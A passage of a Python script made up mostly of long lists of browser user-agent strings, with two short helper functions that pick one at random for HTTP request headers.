"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
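# Illustrative usage sketch (added for clarity; not part of the original script):
# lists like `userAgents` above are typically consumed by drawing one entry at
# random and sending it as the User-Agent header of an outgoing HTTP request.
# The helper name `random_user_agent_header` is hypothetical; only the standard
# library `random` module is assumed.
def random_user_agent_header(agents=userAgents):
    import random
    # Pick one user-agent string and wrap it in a headers dict suitable for
    # passing to an HTTP client (e.g. requests.get(url, headers=...)).
    return {'User-Agent': random.choice(agents)}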
mozila = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0)',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
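# --- usage sketch (illustrative addition, not part of the original script) ---
# A user-agent pool like the lists above and below is normally consumed by
# picking one entry at random per request, so successive requests present
# different client fingerprints. The helper below is a minimal sketch of that
# idea; the function name and the use of the `requests` library are assumptions
# made for illustration only.
import random

import requests


def fetch_with_random_ua(url, ua_pool, timeout=10):
    """GET `url`, sending a User-Agent chosen at random from `ua_pool`."""
    headers = {'User-Agent': random.choice(ua_pool)}  # rotate the fingerprint
    return requests.get(url, headers=headers, timeout=timeout)
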
useragent = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
